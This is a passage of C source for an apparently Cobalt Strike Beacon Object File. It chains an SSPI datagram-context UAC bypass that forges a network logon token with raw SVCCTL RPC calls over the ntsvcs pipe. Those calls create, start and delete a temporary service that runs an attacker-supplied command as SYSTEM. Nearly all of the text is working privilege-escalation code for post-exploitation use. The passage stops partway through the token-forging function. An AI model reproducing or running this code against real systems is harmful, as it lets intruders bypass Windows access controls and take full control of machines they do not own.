    DECLSPEC_IMPORT     WINBASEAPI WINBOOL WINAPI KERNEL32$ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
    DECLSPEC_IMPORT     HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
    DECLSPEC_IMPORT     WINBASEAPI int __cdecl MSVCRT$_snprintf(char *buffer, size_t count, const char *format, ...);
    DECLSPEC_IMPORT     WINBASEAPI void *__cdecl MSVCRT$malloc(size_t size);
    DECLSPEC_IMPORT     WINBASEAPI DWORD WINAPI KERNEL32$GetTickCount(VOID);

}

// rpc command ids
#define RPC_CMD_ID_OPEN_SC_MANAGER 27
#define RPC_CMD_ID_CREATE_SERVICE 24
#define RPC_CMD_ID_START_SERVICE 31
#define RPC_CMD_ID_DELETE_SERVICE 2

// rpc command output lengths
#define RPC_OUTPUT_LENGTH_OPEN_SC_MANAGER 24
#define RPC_OUTPUT_LENGTH_CREATE_SERVICE 28
#define RPC_OUTPUT_LENGTH_START_SERVICE 4
#define RPC_OUTPUT_LENGTH_DELETE_SERVICE 4

#define MAX_RPC_PACKET_LENGTH 4096
#define MAX_PROCEDURE_DATA_LENGTH 2048

#define CALC_ALIGN_PADDING(VALUE_LENGTH, ALIGN_BYTES) ((((VALUE_LENGTH + ALIGN_BYTES - 1) / ALIGN_BYTES) * ALIGN_BYTES) - VALUE_LENGTH)

struct RpcBaseHeaderStruct
{
    WORD wVersion;
    BYTE bPacketType;
    BYTE bPacketFlags;
    DWORD dwDataRepresentation;
    WORD wFragLength;
    WORD wAuthLength;
    DWORD dwCallIndex;
};

struct RpcRequestHeaderStruct
{
    DWORD dwAllocHint;
    WORD wContextID;
    WORD wProcedureNumber;
};

struct RpcResponseHeaderStruct
{
    DWORD dwAllocHint;
    WORD wContextID;
    BYTE bCancelCount;
    BYTE bAlign[1];
};

struct RpcBindRequestContextEntryStruct
{
    WORD wContextID;
    WORD wTransItemCount;
    BYTE bInterfaceUUID[16];
    DWORD dwInterfaceVersion;
    BYTE bTransferSyntaxUUID[16];
    DWORD dwTransferSyntaxVersion;
};

struct RpcBindRequestHeaderStruct
{
    WORD wMaxSendFrag;
    WORD wMaxRecvFrag;
    DWORD dwAssocGroup;
    BYTE bContextCount;
    BYTE bAlign[3];

    RpcBindRequestContextEntryStruct Context;
};

struct RpcBindResponseContextEntryStruct
{
    WORD wResult;
    WORD wAlign;
    BYTE bTransferSyntax[16];
    DWORD dwTransferSyntaxVersion;
};

struct RpcBindResponseHeader1Struct
{
    WORD wMaxSendFrag;
    WORD wMaxRecvFrag;
    DWORD dwAssocGroup;
};

struct RpcBindResponseHeader2Struct
{
    DWORD dwContextResultCount;
    RpcBindResponseContextEntryStruct Context;
};

struct RpcConnectionStruct
{
    HANDLE hFile;
    DWORD dwCallIndex;

    DWORD dwInputError;

    DWORD dwRequestInitialised;

    BYTE bProcedureInputData[MAX_PROCEDURE_DATA_LENGTH];
    DWORD dwProcedureInputDataLength;

    BYTE bProcedureOutputData[MAX_PROCEDURE_DATA_LENGTH];
    DWORD dwProcedureOutputDataLength;
};

DWORD RpcConvertUUID(char* pString, BYTE* pUUID, DWORD dwMaxLength)
{
    BYTE bUUID[16];
    BYTE bFixedUUID[16];
    DWORD dwUUIDLength = 0;
    BYTE bCurrInputChar = 0;
    BYTE bConvertedByte = 0;
    DWORD dwProcessedByteCount = 0;
    BYTE bCurrOutputByte = 0;

    // ensure output buffer is large enough
    if (dwMaxLength < 16)
    {
        return 1;
    }

    // check uuid length
    dwUUIDLength = MSVCRT$strlen("00000000-0000-0000-0000-000000000000");
    if (MSVCRT$strlen(pString) != dwUUIDLength)
    {
        return 1;
    }

    // convert string to uuid
    for (DWORD i = 0; i < dwUUIDLength; i++)
    {
        // get current input character
        bCurrInputChar = *(BYTE*)((BYTE*)pString + i);

        // check if a dash character is expected here
        if (i == 8 || i == 13 || i == 18 || i == 23)
        {
            if (bCurrInputChar == '-')
            {
                continue;
            }
            else
            {
                return 1;
            }
        }
        else
        {
            // check current input character value
            if (bCurrInputChar >= 'a' && bCurrInputChar <= 'f')
            {
                bConvertedByte = 0xA + (bCurrInputChar - 'a');
            }
            else if (bCurrInputChar >= 'A' && bCurrInputChar <= 'F')
            {
                bConvertedByte = 0xA + (bCurrInputChar - 'A');
            }
            else if (bCurrInputChar >= '0' && bCurrInputChar <= '9')
            {
                bConvertedByte = 0 + (bCurrInputChar - '0');
            }
            else
            {
                // invalid character
                return 1;
            }

            if ((dwProcessedByteCount % 2) == 0)
            {
                bCurrOutputByte = bConvertedByte * 0x10;
            }
            else
            {
                bCurrOutputByte += bConvertedByte;

                // store current uuid byte
                bUUID[(dwProcessedByteCount - 1) / 2] = bCurrOutputByte;
            }
            dwProcessedByteCount++;
        }
    }

    // fix uuid endianness
    MSVCRT$memcpy((void*)bFixedUUID, (void*)bUUID, sizeof(bUUID));
    bFixedUUID[0] = bUUID[3];
    bFixedUUID[1] = bUUID[2];
    bFixedUUID[2] = bUUID[1];
    bFixedUUID[3] = bUUID[0];
    bFixedUUID[4] = bUUID[5];
    bFixedUUID[5] = bUUID[4];
    bFixedUUID[6] = bUUID[7];
    bFixedUUID[7] = bUUID[6];

    // store uuid
    MSVCRT$memcpy((void*)pUUID, (void*)bFixedUUID, sizeof(bUUID));

    return 0;
}

DWORD RpcBind(RpcConnectionStruct* pRpcConnection, char* pInterfaceUUID, DWORD dwInterfaceVersion)
{
    RpcBaseHeaderStruct RpcBaseHeader;
    RpcBindRequestHeaderStruct RpcBindRequestHeader;
    DWORD dwBytesWritten = 0;
    DWORD dwBytesRead = 0;
    BYTE *bResponseData = (BYTE *)MSVCRT$malloc(MAX_RPC_PACKET_LENGTH); // did this to fix what seemed to be a stack overflow
    //BYTE bResponseData[MAX_RPC_PACKET_LENGTH];
    RpcBaseHeaderStruct* pRpcResponseBaseHeader = NULL;
    RpcBindResponseHeader1Struct* pRpcBindResponseHeader1 = NULL;
    RpcBindResponseHeader2Struct* pRpcBindResponseHeader2 = NULL;
    BYTE* pSecondaryAddrHeaderBlock = NULL;
    WORD wSecondaryAddrLen = 0;
    DWORD dwSecondaryAddrAlign = 0;

    // set base header details
    MSVCRT$memset((void*)&RpcBaseHeader, 0, sizeof(RpcBaseHeader));
    RpcBaseHeader.wVersion = 5;
    RpcBaseHeader.bPacketType = 11;
    RpcBaseHeader.bPacketFlags = 3;
    RpcBaseHeader.dwDataRepresentation = 0x10;
    RpcBaseHeader.wFragLength = sizeof(RpcBaseHeader) + sizeof(RpcBindRequestHeader);
    RpcBaseHeader.wAuthLength = 0;
    RpcBaseHeader.dwCallIndex = pRpcConnection->dwCallIndex;

    // set bind request header details
    MSVCRT$memset((void*)&RpcBindRequestHeader, 0, sizeof(RpcBindRequestHeader));
    RpcBindRequestHeader.wMaxSendFrag = MAX_RPC_PACKET_LENGTH;
    RpcBindRequestHeader.wMaxRecvFrag = MAX_RPC_PACKET_LENGTH;
    RpcBindRequestHeader.dwAssocGroup = 0;
    RpcBindRequestHeader.bContextCount = 1;
    RpcBindRequestHeader.Context.wContextID = 0;
    RpcBindRequestHeader.Context.wTransItemCount = 1;
    RpcBindRequestHeader.Context.dwTransferSyntaxVersion = 2;

    // get interface UUID
    if (RpcConvertUUID(pInterfaceUUID, RpcBindRequestHeader.Context.bInterfaceUUID, sizeof(RpcBindRequestHeader.Context.bInterfaceUUID)) != 0)
    {
        return 1;
    }
    RpcBindRequestHeader.Context.dwInterfaceVersion = dwInterfaceVersion;

    // {8a885d04-1ceb-11c9-9fe8-08002b104860} (NDR)
    if (RpcConvertUUID("8a885d04-1ceb-11c9-9fe8-08002b104860", RpcBindRequestHeader.Context.bTransferSyntaxUUID, sizeof(RpcBindRequestHeader.Context.bTransferSyntaxUUID)) != 0)
    {
        return 1;
    }

    // write base header
    if (KERNEL32$WriteFile(pRpcConnection->hFile, (void*)&RpcBaseHeader, sizeof(RpcBaseHeader), &dwBytesWritten, NULL) == 0)
    {
        return 1;
    }

    // write bind request header
    if (KERNEL32$WriteFile(pRpcConnection->hFile, (void*)&RpcBindRequestHeader, sizeof(RpcBindRequestHeader), &dwBytesWritten, NULL) == 0)
    {
        return 1;
    }

    // increase call index
    pRpcConnection->dwCallIndex++;

    // get bind response
    MSVCRT$memset((void*)bResponseData, 0, MAX_RPC_PACKET_LENGTH);
    if (KERNEL32$ReadFile(pRpcConnection->hFile, (void*)bResponseData, MAX_RPC_PACKET_LENGTH, &dwBytesRead, NULL) == 0)
    {
        return 1;
    }

    // get a ptr to the base response header
    pRpcResponseBaseHeader = (RpcBaseHeaderStruct*)bResponseData;

    // validate base response header
    if (pRpcResponseBaseHeader->wVersion != 5)
    {
        return 1;
    }
    if (pRpcResponseBaseHeader->bPacketType != 12)
    {
        return 1;
    }
    if (pRpcResponseBaseHeader->bPacketFlags != 3)
    {
        return 1;
    }
    if (pRpcResponseBaseHeader->wFragLength != dwBytesRead)
    {
        return 1;
    }

    // get a ptr to the main bind response header body
    pRpcBindResponseHeader1 = (RpcBindResponseHeader1Struct*)((BYTE*)pRpcResponseBaseHeader + sizeof(RpcBaseHeaderStruct));

    // get secondary addr header ptr
    pSecondaryAddrHeaderBlock = (BYTE*)pRpcBindResponseHeader1 + sizeof(RpcBindResponseHeader1Struct);
    wSecondaryAddrLen = *(WORD*)pSecondaryAddrHeaderBlock;

    // validate secondary addr length
    if (wSecondaryAddrLen > 256)
    {
        return 1;
    }

    // calculate padding for secondary addr value if necessary
    dwSecondaryAddrAlign = CALC_ALIGN_PADDING((sizeof(WORD) + wSecondaryAddrLen), 4);

    // get a ptr to the main bind response header body (after the variable-length secondary addr field)
    pRpcBindResponseHeader2 = (RpcBindResponseHeader2Struct*)((BYTE*)pSecondaryAddrHeaderBlock + sizeof(WORD) + wSecondaryAddrLen + dwSecondaryAddrAlign);

    // validate context count
    if (pRpcBindResponseHeader2->dwContextResultCount != 1)
    {
        return 1;
    }

    // ensure the result value for context #1 was successful
    if (pRpcBindResponseHeader2->Context.wResult != 0)
    {
        return 1;
    }

    MSVCRT$free(bResponseData);

    return 0;
}

DWORD RpcConnect(char* pPipeName, char* pInterfaceUUID, DWORD dwInterfaceVersion, RpcConnectionStruct* pRpcConnection)
{
    HANDLE hFile = NULL;
    char szPipePath[512];
    //char ok[3000];
    //RpcConnectionStruct RpcConnection;
    RpcConnectionStruct *RpcConnection = (RpcConnectionStruct*)MSVCRT$malloc(sizeof(RpcConnectionStruct));

    // set pipe path
    MSVCRT$memset(szPipePath, 0, sizeof(szPipePath));
    MSVCRT$_snprintf(szPipePath, sizeof(szPipePath) - 1, "\\\\127.0.0.1\\pipe\\%s", pPipeName);

    // open rpc pipe
    hFile = KERNEL32$CreateFileA(szPipePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        return 1;
    }

    // initialise rpc connection data
    MSVCRT$memset((void*)RpcConnection, 0, sizeof(RpcConnectionStruct));
    RpcConnection->hFile = hFile;
    RpcConnection->dwCallIndex = 1;

    // bind rpc connection
    if (RpcBind(RpcConnection, pInterfaceUUID, dwInterfaceVersion) != 0)
    {
        return 1;
    }

    // store connection data
    MSVCRT$memcpy((void*)pRpcConnection, (void*)RpcConnection, sizeof(RpcConnectionStruct));

    MSVCRT$free(RpcConnection);

    return 0;
}

DWORD RpcSendRequest(RpcConnectionStruct* pRpcConnection, DWORD dwProcedureNumber)
{
    RpcBaseHeaderStruct RpcBaseHeader;
    RpcRequestHeaderStruct RpcRequestHeader;
    DWORD dwBytesWritten = 0;
    //BYTE bResponseData[MAX_RPC_PACKET_LENGTH];
    BYTE *bResponseData = (BYTE *)MSVCRT$malloc(MAX_RPC_PACKET_LENGTH); // did this to fix what seemed to be a stack overflow
    RpcBaseHeaderStruct* pRpcResponseBaseHeader = NULL;
    RpcResponseHeaderStruct* pRpcResponseHeader = NULL;
    DWORD dwProcedureResponseDataLength = 0;
    DWORD dwBytesRead = 0;
    BYTE* pTempProcedureResponseDataPtr = NULL;

    // ensure rpc request has been initialised
    if (pRpcConnection->dwRequestInitialised == 0)
    {
        return 1;
    }

    // clear initialised flag
    pRpcConnection->dwRequestInitialised = 0;

    // check for input errors
    if (pRpcConnection->dwInputError != 0)
    {
        return 1;
    }

    // set base header details
    MSVCRT$memset((void*)&RpcBaseHeader, 0, sizeof(RpcBaseHeader));
    RpcBaseHeader.wVersion = 5;
    RpcBaseHeader.bPacketType = 0;
    RpcBaseHeader.bPacketFlags = 3;
    RpcBaseHeader.dwDataRepresentation = 0x10;
    RpcBaseHeader.wFragLength = sizeof(RpcBaseHeader) + sizeof(RpcRequestHeader) + pRpcConnection->dwProcedureInputDataLength;
    RpcBaseHeader.wAuthLength = 0;
    RpcBaseHeader.dwCallIndex = pRpcConnection->dwCallIndex;

    // set request header details
    MSVCRT$memset((void*)&RpcRequestHeader, 0, sizeof(RpcRequestHeader));
    RpcRequestHeader.dwAllocHint = 0;
    RpcRequestHeader.wContextID = 0;
    RpcRequestHeader.wProcedureNumber = (WORD)dwProcedureNumber;

    // write base header
    if (KERNEL32$WriteFile(pRpcConnection->hFile, (void*)&RpcBaseHeader, sizeof(RpcBaseHeader), &dwBytesWritten, NULL) == 0)
    {
        return 1;
    }

    // write request header
    if (KERNEL32$WriteFile(pRpcConnection->hFile, (void*)&RpcRequestHeader, sizeof(RpcRequestHeader), &dwBytesWritten, NULL) == 0)
    {
        return 1;
    }

    // write request body
    if (KERNEL32$WriteFile(pRpcConnection->hFile, (void*)pRpcConnection->bProcedureInputData, pRpcConnection->dwProcedureInputDataLength, &dwBytesWritten, NULL) == 0)
    {
        return 1;
    }

    // increase call index
    pRpcConnection->dwCallIndex++;

    // get bind response
    MSVCRT$memset((void*)bResponseData, 0, MAX_RPC_PACKET_LENGTH);
    if (KERNEL32$ReadFile(pRpcConnection->hFile, (void*)bResponseData, MAX_RPC_PACKET_LENGTH, &dwBytesRead, NULL) == 0)
    {
        return 1;
    }

    // get a ptr to the base response header
    pRpcResponseBaseHeader = (RpcBaseHeaderStruct*)bResponseData;

    // validate base response header
    if (pRpcResponseBaseHeader->wVersion != 5)
    {
        return 1;
    }
    if (pRpcResponseBaseHeader->bPacketType != 2)
    {
        return 1;
    }
    if (pRpcResponseBaseHeader->bPacketFlags != 3)
    {
        return 1;
    }
    if (pRpcResponseBaseHeader->wFragLength != dwBytesRead)
    {
        return 1;
    }

    // get a ptr to the main response header body
    pRpcResponseHeader = (RpcResponseHeaderStruct*)((BYTE*)pRpcResponseBaseHeader + sizeof(RpcBaseHeaderStruct));

    // context ID must be 0
    if (pRpcResponseHeader->wContextID != 0)
    {
        return 1;
    }

    // calculate command response data length
    dwProcedureResponseDataLength = pRpcResponseBaseHeader->wFragLength - sizeof(RpcBaseHeaderStruct) - sizeof(RpcResponseHeaderStruct);

    // store response data
    if (dwProcedureResponseDataLength > sizeof(pRpcConnection->bProcedureOutputData))
    {
        return 1;
    }
    pTempProcedureResponseDataPtr = (BYTE*)pRpcResponseHeader + sizeof(RpcResponseHeaderStruct);
    MSVCRT$memcpy(pRpcConnection->bProcedureOutputData, pTempProcedureResponseDataPtr, dwProcedureResponseDataLength);

    // store response data length
    pRpcConnection->dwProcedureOutputDataLength = dwProcedureResponseDataLength;

    MSVCRT$free(bResponseData);

    return 0;
}

DWORD RpcInitialiseRequestData(RpcConnectionStruct* pRpcConnection)
{
    // initialise request data
    MSVCRT$memset(pRpcConnection->bProcedureInputData, 0, sizeof(pRpcConnection->bProcedureInputData));
    pRpcConnection->dwProcedureInputDataLength = 0;
    MSVCRT$memset(pRpcConnection->bProcedureOutputData, 0, sizeof(pRpcConnection->bProcedureOutputData));
    pRpcConnection->dwProcedureOutputDataLength = 0;

    // reset input error flag
    pRpcConnection->dwInputError = 0;

    // set initialised flag
    pRpcConnection->dwRequestInitialised = 1;

    return 0;
}

DWORD RpcAppendRequestData_Binary(RpcConnectionStruct* pRpcConnection, BYTE* pData, DWORD dwDataLength)
{
    DWORD dwBytesAvailable = 0;

    // ensure the request has been initialised
    if (pRpcConnection->dwRequestInitialised == 0)
    {
        return 1;
    }

    // calculate number of bytes remaining in the input buffer
    dwBytesAvailable = sizeof(pRpcConnection->bProcedureInputData) - pRpcConnection->dwProcedureInputDataLength;
    if (dwDataLength > dwBytesAvailable)
    {
        // set input error flag
        pRpcConnection->dwInputError = 1;

        return 1;
    }

    // store data in buffer
    MSVCRT$memcpy((void*)&pRpcConnection->bProcedureInputData[pRpcConnection->dwProcedureInputDataLength], pData, dwDataLength);
    pRpcConnection->dwProcedureInputDataLength += dwDataLength;

    // align to 4 bytes if necessary
    pRpcConnection->dwProcedureInputDataLength += CALC_ALIGN_PADDING(dwDataLength, 4);

    return 0;
}

DWORD RpcAppendRequestData_Dword(RpcConnectionStruct* pRpcConnection, DWORD dwValue)
{
    // add dword value
    if (RpcAppendRequestData_Binary(pRpcConnection, (BYTE*)&dwValue, sizeof(DWORD)) != 0)
    {
        return 1;
    }

    return 0;
}

DWORD RpcDisconnect(RpcConnectionStruct* pRpcConnection)
{
    // close pipe handle
    KERNEL32$CloseHandle(pRpcConnection->hFile);

    return 0;
}

int InvokeCreateSvcRpcMain(char* pExecCmd)
{
    //RpcConnectionStruct RpcConnection;
    RpcConnectionStruct *RpcConnection = (RpcConnectionStruct*)MSVCRT$malloc(sizeof(RpcConnectionStruct));
    BYTE bServiceManagerObject[20];
    BYTE bServiceObject[20];
    DWORD dwReturnValue = 0;
    char szServiceName[256];
    DWORD dwServiceNameLength = 0;
    char szServiceCommandLine[256];
    DWORD dwServiceCommandLineLength = 0;

    BeaconPrintf(CALLBACK_OUTPUT,"Invoking CreateSvcRpc (by @x86matthew)\n");

    // generate a temporary service name
    MSVCRT$memset(szServiceName, 0, sizeof(szServiceName));
    MSVCRT$_snprintf(szServiceName, sizeof(szServiceName) - 1, "CreateSvcRpc_%u", KERNEL32$GetTickCount());
    dwServiceNameLength = MSVCRT$strlen(szServiceName) + 1;

    // set service command line
    MSVCRT$memset(szServiceCommandLine, 0, sizeof(szServiceCommandLine));
    MSVCRT$_snprintf(szServiceCommandLine, sizeof(szServiceCommandLine) - 1, "cmd /c start %s", pExecCmd);
    dwServiceCommandLineLength = MSVCRT$strlen(szServiceCommandLine) + 1;

    BeaconPrintf(CALLBACK_OUTPUT,"Connecting to \\\\127.0.0.1\\pipe\\ntsvcs RPC pipe \n");

    // open SVCCTL v2.0
    if (RpcConnect("ntsvcs", "367abb81-9844-35f1-ad32-98f038001003", 2, RpcConnection) != 0)
    {
        BeaconPrintf(CALLBACK_ERROR, "Failed to connect to RPC pipe\n");
        MSVCRT$free(RpcConnection);
        return 1;
    }

    BeaconPrintf(CALLBACK_OUTPUT,"Opening service manager...\n");

    // OpenSCManager
    RpcInitialiseRequestData(RpcConnection);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    RpcAppendRequestData_Dword(RpcConnection, SC_MANAGER_ALL_ACCESS);
    if (RpcSendRequest(RpcConnection, RPC_CMD_ID_OPEN_SC_MANAGER) != 0)
    {
        // error
        RpcDisconnect(RpcConnection);
        MSVCRT$free(RpcConnection);
        return 1;
    }

    // validate rpc output data length
    if (RpcConnection->dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_OPEN_SC_MANAGER)
    {
        // error
        RpcDisconnect(RpcConnection);
        MSVCRT$free(RpcConnection);
        return 1;
    }

    // get return value
    dwReturnValue = (DWORD)RpcConnection->bProcedureOutputData[20];

    // check return value
    if (dwReturnValue != 0)
    {
        BeaconPrintf(CALLBACK_ERROR, "OpenSCManager error: %u\n", dwReturnValue);

        // error
        RpcDisconnect(RpcConnection);
        MSVCRT$free(RpcConnection);
        return 1;
    }

    // store service manager object
    MSVCRT$memcpy(bServiceManagerObject, RpcConnection->bProcedureOutputData, sizeof(bServiceManagerObject));

    BeaconPrintf(CALLBACK_OUTPUT,"Creating temporary service...\n");

    // CreateService
    RpcInitialiseRequestData(RpcConnection);
    RpcAppendRequestData_Binary(RpcConnection, bServiceManagerObject, sizeof(bServiceManagerObject));
    RpcAppendRequestData_Dword(RpcConnection, dwServiceNameLength);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    RpcAppendRequestData_Dword(RpcConnection, dwServiceNameLength);
    RpcAppendRequestData_Binary(RpcConnection, (BYTE*)szServiceName, dwServiceNameLength);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    RpcAppendRequestData_Dword(RpcConnection, SERVICE_ALL_ACCESS);
    RpcAppendRequestData_Dword(RpcConnection, SERVICE_WIN32_OWN_PROCESS);
    RpcAppendRequestData_Dword(RpcConnection, SERVICE_DEMAND_START);
    RpcAppendRequestData_Dword(RpcConnection, SERVICE_ERROR_IGNORE);
    RpcAppendRequestData_Dword(RpcConnection, dwServiceCommandLineLength);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    RpcAppendRequestData_Dword(RpcConnection, dwServiceCommandLineLength);
    RpcAppendRequestData_Binary(RpcConnection, (BYTE*)szServiceCommandLine, dwServiceCommandLineLength);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    if (RpcSendRequest(RpcConnection, RPC_CMD_ID_CREATE_SERVICE) != 0)
    {
        // error
        RpcDisconnect(RpcConnection);
        MSVCRT$free(RpcConnection);
        return 1;
    }

    // validate rpc output data length
    if (RpcConnection->dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_CREATE_SERVICE)
    {
        // error
        RpcDisconnect(RpcConnection);
        MSVCRT$free(RpcConnection);
        return 1;
    }

    // get return value
    dwReturnValue = (DWORD)RpcConnection->bProcedureOutputData[24];

    // check return value
    if (dwReturnValue != 0)
    {
        BeaconPrintf(CALLBACK_ERROR, "CreateService error: %u\n", dwReturnValue);

        // error
        RpcDisconnect(RpcConnection);
        MSVCRT$free(RpcConnection);
        return 1;
    }

    //MSVCRT$printf("RpcConnection->bProcedureOutputData[4]: %#p\n", &(RpcConnection->bProcedureOutputData[4]));

    // store service object
    MSVCRT$memcpy(bServiceObject, &(RpcConnection->bProcedureOutputData[4]), sizeof(bServiceObject));

    BeaconPrintf(CALLBACK_OUTPUT,"Executing '%s' as SYSTEM user...\n", pExecCmd);

    // StartService
    RpcInitialiseRequestData(RpcConnection);
    RpcAppendRequestData_Binary(RpcConnection, bServiceObject, sizeof(bServiceObject));
    RpcAppendRequestData_Dword(RpcConnection, 0);
    RpcAppendRequestData_Dword(RpcConnection, 0);
    if (RpcSendRequest(RpcConnection, RPC_CMD_ID_START_SERVICE) != 0)
    {
        // error
        RpcDisconnect(RpcConnection);
        MSVCRT$free(RpcConnection);
        return 1;
    }

    // validate rpc output data length
    if (RpcConnection->dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_START_SERVICE)
    {
        // error
        RpcDisconnect(RpcConnection);
        MSVCRT$free(RpcConnection);
        return 1;
    }

    // get return value
    dwReturnValue = (DWORD)RpcConnection->bProcedureOutputData[0];

    // check return value
    if (dwReturnValue != 0 && dwReturnValue != ERROR_SERVICE_REQUEST_TIMEOUT)
    {
        //BeaconPrintf(CALLBACK_ERROR, "StartService error: %d\n", dwReturnValue);

        // error
        //RpcDisconnect(RpcConnection);

        //return 1;
    }

    BeaconPrintf(CALLBACK_OUTPUT,"Deleting temporary service...\n");

    // DeleteService
    RpcInitialiseRequestData(RpcConnection);
    RpcAppendRequestData_Binary(RpcConnection, bServiceObject, sizeof(bServiceObject));
    if (RpcSendRequest(RpcConnection, RPC_CMD_ID_DELETE_SERVICE) != 0)
    {
        // error
        RpcDisconnect(RpcConnection);
        MSVCRT$free(RpcConnection);
        return 1;
    }

    // validate rpc output data length
    if (RpcConnection->dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_DELETE_SERVICE)
    {
        // error
        RpcDisconnect(RpcConnection);
        MSVCRT$free(RpcConnection);
        return 1;
    }

    // get return value
    dwReturnValue = (DWORD)RpcConnection->bProcedureOutputData[0];

    // check return value
    if (dwReturnValue != 0)
    {
        BeaconPrintf(CALLBACK_ERROR, "DeleteService error: %u\n", dwReturnValue);

        // error
        RpcDisconnect(RpcConnection);
        MSVCRT$free(RpcConnection);
        return 1;
    }

    BeaconPrintf(CALLBACK_OUTPUT,"Finished\n");

    // disconnect from rpc pipe
    if (RpcDisconnect(RpcConnection) != 0)
    {
        MSVCRT$free(RpcConnection);
        return 1;
    }
    
    MSVCRT$free(RpcConnection);

    return 0;
}

// OG SspUACBypass code
#define SEC_SUCCESS(Status) ((Status) >= 0)
#define MAX_MESSAGE_SIZE 12000

#pragma comment (lib, "Secur32.lib")

HANDLE ForgeNetworkAuthToken();
void CheckTokenSession(HANDLE hToken);
BOOL IsThreadTokenIdentification();

void go(char * args, unsigned long length) 
{
    datap parser;
    char *fileToRun = NULL;
    BeaconDataParse(&parser, args, length);
    fileToRun = BeaconDataExtract(&parser, NULL);
    //BeaconPrintf(CALLBACK_OUTPUT, "fileToRun: %s\n", fileToRun);
    //char defaultCmdline[] = "cmd /c \"C:\\Users\\randy\\Desktop\\messagebox2.exe\"";
    //char defaultCmdline[] = "cmd /c \"whoami > C:\\Windows\\bypassuac.txt\"";
    //char* cmdline = defaultCmdline;
    HANDLE hNetworkToken = INVALID_HANDLE_VALUE;


    BeaconPrintf(CALLBACK_OUTPUT, "\n\tSspiUacBypass - Bypassing UAC with SSPI Datagram Contexts\n\tby @splinter_code\n\n");
    //MSVCRT$printf("\n\tSspiUacBypass - Bypassing UAC with SSPI Datagram Contexts\n\tby @splinter_code\n\n");
    BeaconPrintf(CALLBACK_OUTPUT, "Forging a token from a fake Network Authentication through Datagram Contexts\n");
    //MSVCRT$printf("Forging a token from a fake Network Authentication through Datagram Contexts\n");
    hNetworkToken = ForgeNetworkAuthToken();
    if (hNetworkToken == INVALID_HANDLE_VALUE) {
        BeaconPrintf(CALLBACK_ERROR,"Cannot forge the network auth token, exiting...\n");
        return;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "Network Authentication token forged correctly, handle --> 0x%x\n", hNetworkToken);
    //MSVCRT$printf("Network Authentication token forged correctly, handle --> 0x%x\n", hNetworkToken);
    CheckTokenSession(hNetworkToken);
    ADVAPI32$ImpersonateLoggedOnUser(hNetworkToken);
    // Some Windows versions check if the current process token session ID matches the forged token session ID
    // Older Windows versions don't, so trying anyway to impersonate even if the forged token session ID is 0
    if (IsThreadTokenIdentification()) {
        BeaconPrintf(CALLBACK_ERROR, "Impersonating the forged token returned an Identification token. Bypass failed :( \n");
    }
    else {
        BeaconPrintf(CALLBACK_OUTPUT, "Bypass Success! Now impersonating the forged token... Loopback network auth should be seen as elevated now\n");
        //MSVCRT$printf("Bypass Success! Now impersonating the forged token... Loopback network auth should be seen as elevated now\n");
        InvokeCreateSvcRpcMain(fileToRun);
    }
    ADVAPI32$RevertToSelf();
    KERNEL32$CloseHandle(hNetworkToken);
    return;
}

HANDLE ForgeNetworkAuthToken() {
    CredHandle hCredClient, hCredServer;
    TimeStamp lifetimeClient, lifetimeServer;
    SecBufferDesc negotiateDesc, challengeDesc, authenticateDesc;
    SecBuffer negotiateBuffer, challengeBuffer, authenticateBuffer;
    CtxtHandle clientContextHandle, serverContextHandle;
    ULONG clientContextAttributes, serverContextAttributes;
    SECURITY_STATUS secStatus;
    HANDLE hTokenNetwork = INVALID_HANDLE_VALUE;
    SEC_CHAR* NTLMSP_NAME2 = "NTLM";

    secStatus = SECUR32$AcquireCredentialsHandleA(NULL, NTLMSP_NAME2, SECPKG_CRED_OUTBOUND, NULL, NULL, NULL, NULL, &hCredClient, &lifetimeClient);
    if (!SEC_SUCCESS(secStatus)) {
        BeaconPrintf(CALLBACK_ERROR, "AcquireCredentialsHandle Client failed with secstatus code 0x%x \n", secStatus);
        return NULL;
    }

    secStatus = SECUR32$AcquireCredentialsHandleA(NULL, NTLMSP_NAME2, SECPKG_CRED_INBOUND, NULL, NULL, NULL, NULL, &hCredServer, &lifetimeServer);
    if (!SEC_SUCCESS(secStatus)) {
        BeaconPrintf(CALLBACK_ERROR, "AcquireCredentialsHandle Server failed with secstatus code 0x%x \n", secStatus);
        return NULL;
    }

    negotiateDesc.ulVersion = 0;
    negotiateDesc.cBuffers = 1;
    negotiateDesc.pBuffers = &negotiateBuffer;
    negotiateBuffer.cbBuffer = MAX_MESSAGE_SIZE;
    negotiateBuffer.BufferType = SECBUFFER_TOKEN;
    negotiateBuffer.pvBuffer = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_MESSAGE_SIZE);
    secStatus = SECUR32$InitializeSecurityContextA(&hCredClient, NULL, NULL, ISC_REQ_DATAGRAM, 0, SECURITY_NATIVE_DREP, NULL, 0, &clientContextHandle, &negotiateDesc, &clientContextAttributes, &lifetimeClient);
    if (!SEC_SUCCESS(secStatus)) {
        BeaconPrintf(CALLBACK_ERROR, "InitializeSecurityContext Type 1 failed with secstatus code 0x%x \n", secStatus);
        return NULL;
    }

    challengeDesc.ulVersion = 0;
    challengeDesc.cBuffers = 1;
